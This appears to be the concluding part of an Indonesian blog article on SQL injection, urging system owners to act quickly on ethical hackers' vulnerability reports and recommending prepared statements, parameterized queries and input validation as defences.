Seorang hacker profesional bekerja dengan penuh tanggung jawab dan etika yang tinggi. Tujuan utama adalah untuk mengidentifikasi dan melaporkan kerentanannya secara konstruktif demi melindungi sistem serta data yang ada. Meskipun seorang hacker bisa mengeksploitasi celah untuk keuntungan pribadi, tindakan tersebut tidaklah sejalan dengan prinsip kerja seorang hacker etis. Oleh karena itu, setiap laporan yang disampaikan kepada pemilik sistem harus dilakukan dengan hati-hati dan profesional, dengan harapan agar sistem dapat diperbaiki dengan cepat sebelum celah ini dimanfaatkan oleh pihak yang lebih berbahaya.

Memahami dan menghargai kontribusi yang diberikan oleh seorang hacker etis sangat penting untuk menciptakan hubungan yang saling menguntungkan. Oleh karena itu, kami mendorong pemilik sistem untuk menghargai setiap laporan yang diterima, untuk memastikan bahwa sistem mereka tetap aman dan terlindungi dari ancaman yang lebih besar di masa depan. Respons yang cepat dan profesional terhadap masalah ini akan menjaga integritas sistem dan data, serta memastikan bahwa kerentanannya dapat ditangani dengan langkah-langkah yang tepat.

Jika pemilik sistem tidak merespons atau tidak mengindahkan laporan yang disampaikan, seorang hacker etis bisa berisiko melihat data dan akses yang ditemukan dijual di situs-situs ilegal. Informasi yang berhasil dieksploitasi dapat diperdagangkan di pasar gelap yang sangat merugikan pemilik sistem. Dengan kata lain, jika sebuah kerentanannya dibiarkan terbuka dan tidak diperbaiki, kerentanannya bisa berujung pada eksploitasi yang jauh lebih merugikan dan berdampak jauh lebih besar. Oleh karena itu, sangat penting bagi pemilik sistem untuk menghargai dan menanggapi laporan yang diberikan dengan cepat. Jangan biarkan kesempatan ini dimanfaatkan oleh pihak yang lebih jahat, yang bisa membahayakan sistem Anda lebih jauh.

Ingatlah: Keamanan sistem adalah investasi yang harus dihargai. Mengabaikan laporan bisa membiarkan celah terbuka bagi serangan yang lebih besar. Oleh karena itu, sebagai pemilik sistem, Anda memiliki kewajiban untuk tidak hanya melindungi data dan aset digital Anda, tetapi juga untuk mendukung para hacker etis yang berusaha membantu Anda dalam meningkatkan pertahanan sistem.

Kesimpulan

SQL Injection bukan sekadar celah keamanan biasa—ini adalah ancaman yang dapat menghancurkan sistem, mengekspos data sensitif, dan memberi akses tidak sah kepada penyerang. Dengan teknik eksploitasi yang tepat, seorang hacker dapat memperoleh kendali penuh atas database, mengakses kredensial pengguna, bahkan menghapus atau memodifikasi data kritis. Ini bukan hanya risiko teknis, tetapi juga ancaman besar bagi reputasi dan integritas bisnis.

Namun, dalam dunia keamanan siber, selalu ada dua sisi: mereka yang mencari dan melaporkan kerentanan demi keamanan, dan mereka yang mengeksploitasinya untuk keuntungan pribadi. Seorang hacker profesional memahami bahwa kekuatan sejati bukanlah dalam merusak, melainkan dalam memahami sistem secara mendalam dan membantu memperbaikinya sebelum jatuh ke tangan yang salah. Karena itu, pengembang dan pemilik sistem harus menghargai setiap laporan yang diberikan dan segera bertindak untuk mengamankan sistem mereka.

Mencegah SQL Injection bukanlah opsi, tetapi keharusan. Gunakan prepared statements, parameterized queries, serta validasi input yang ketat untuk menghilangkan risiko eksploitasi. Lakukan pengujian penetrasi secara rutin dan selalu perbarui sistem keamanan untuk mengantisipasi teknik serangan terbaru. Ingat, dalam dunia digital, keamanan bukanlah sesuatu yang bisa ditunda—karena hacker tidak menunggu.

Di era di mana data adalah mata uang digital, siapa yang mengontrol data, dialah yang memiliki kekuatan. Lindungi sistem Anda sebelum orang lain yang mengendalikannya.

Baca juga: Cara Menggunakan SQLMap di Linux: Panduan Praktis untuk Pemula